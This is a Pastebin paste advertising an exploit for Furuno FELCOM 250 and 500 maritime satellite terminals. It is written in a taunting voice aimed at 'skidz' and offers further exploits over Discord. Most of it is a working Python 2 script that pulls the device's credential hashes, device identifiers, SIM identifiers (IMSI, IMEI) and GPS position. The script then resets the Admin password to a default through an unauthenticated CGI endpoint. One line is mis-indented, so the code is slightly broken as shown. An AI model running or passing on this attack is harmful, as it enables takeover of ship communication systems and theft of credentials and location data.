daily pastebin goal
93%
SHARE
TWEET

[FELCOM 250 / 500 EXPLOIT/LOADER][ONLY VURN]

xB4ckdoorREAL Nov 7th, 2018 121 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. HEY SKIDZ, IF YOU ARE OWN TO CODE YOURSELF, HERE IS THE VURN. DISCOVERED 05/11/18
  2.  
  3. FURUNO FELCOM 250 and 500 devices allow unauthenticated users to change the password for the Admin, Log and Service accounts, as well as the password for the protected "SMS" panel via /cgi-bin/sm_changepassword.cgi and /cgi-bin/sm_sms_changepasswd.cgi.   
  4.  
  5. MIPS PAYLOAD SKIDZ. Make it in python. ;) or contact me to get all fresh and new discovered exploit.
  6. #DISCORD:
  7.  
  8. HEHE OK NOOB... TAKE THIS FUCKING SHIT. [PASSWORD CHANGER]
  9.  
  10. import xml.etree.ElementTree
  11. import requests
  12. import md5
  13. import sys
  14.  
  15. # Replace with your target
  16. the_ip = "http://127.0.0.1:4443"
  17.  
  18. user = "Admin"
  19.  
  20. # Download credentials from host
  21. def getHashes(to_check):
  22.  
  23.     print "[*] Downloading hashes"
  24.     # Download credentials XML file
  25.     dl_xml = requests.get(the_ip+"/xml/permission.xml")
  26.  
  27.     if(dl_xml.status_code != 200):
  28.         print "[*] Error downloading credentials file"
  29.         sys.exit(0)
  30.  
  31.     # Parse downloaded credential file
  32.     parsed = xml.etree.ElementTree.fromstring(dl_xml.text)
  33.  
  34.     # List users and hashes
  35.     if not to_check:
  36.         for i in range(0,4):
  37.             if i==3:
  38.                 print "SMS Server: "+parsed[i][0].text
  39.             else:
  40.                 print parsed[i][0].text+": "+parsed[i][1].text
  41.  
  42.     # Check if hash update applied successfully
  43.     else:
  44.         for i in range(0,3):
  45.             if parsed[i][0].text == user:
  46.                 if parsed[i][1].text == to_check:
  47.                     print user+": Password update verified"
  48.                 else:
  49.                     print user+": Password update mismatch"
  50.  
  51. # Change user's password
  52. def changePw(new_pass):
  53.  
  54.     print "[*] Changing password for "+user
  55.  
  56.     # Generate new MD5 hash
  57.     m = md5.new()
  58.     m.update(new_pass)
  59.     gen_md5 = m.hexdigest()
  60.  
  61.     # Send credential update request
  62.     r = requests.get(the_ip+"/cgi-bin/sm_changepassword.cgi?"+gen_md5+"+"+gen_md5+"+"+user)
  63.  
  64.     # Check if change was successful
  65.     if(r.status_code == 200):
  66.         print "Password successfully changed: "+user+" - "+new_pass
  67.     else:
  68.         print "Error changing password credentials file"
  69.         sys.exit(0)
  70.  
  71.     # Check if hash correctly updated
  72.     getHashes(gen_md5)
  73.  
  74. # Get device info
  75. def getInfo():
  76.     print "[*] Downloading info\n"
  77.     # Download info XML file
  78.     r_inf = requests.get(the_ip+"/xml/info.xml")
  79.     r_gps = requests.get(the_ip+"/xml/modem_status.xml")
  80.  
  81.     if(r_inf.status_code != 200 or r_gps.status_code != 200):
  82.         print "[*] Error downloading info file"
  83.         sys.exit(0)
  84.  
  85.     # Parse downloaded inf file
  86.     parsed_inf = xml.etree.ElementTree.fromstring(r_inf.text)
  87.     parsed_gps = xml.etree.ElementTree.fromstring(r_gps.text.encode('utf-8'))
  88.  
  89.     print "Device Info:"
  90.     print "[*] Maunfacturer: "+str(parsed_inf[0][0].text)
  91.     print "[*] Model: "+str(parsed_inf[0][1].text)
  92.     print "[*] Serial Number: "+str(parsed_inf[0][3].text)
  93.  
  94.     print
  95.  
  96.     print "SIM Info:"
  97.     print "[*] USIMCardID: "+str(parsed_inf[0][4].text)
  98.     print "[*] IMSI: "+str(parsed_inf[0][5].text)
  99.     print "[*] IMEI: "+str(parsed_inf[0][6].text)
  100.  
  101.     print
  102.  
  103.     print "GPS Info:"
  104.     print "[*] Lat: "+str(parsed_gps[7][0].text.encode('utf-8'))
  105.     print "[*] Lat: "+str(parsed_gps[7][1].text.encode('utf-8'))
  106.     print "[*] Last Update: "+str(parsed_gps[7][4].text)
  107.  
  108.         print "\n"
  109.  
  110. def main():
  111.     getInfo()
  112.  
  113.     # Change 'user' password to default (01234567)
  114.     changePw("01234567")
  115.  
  116. if __name__ == "__main__":
  117.     main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top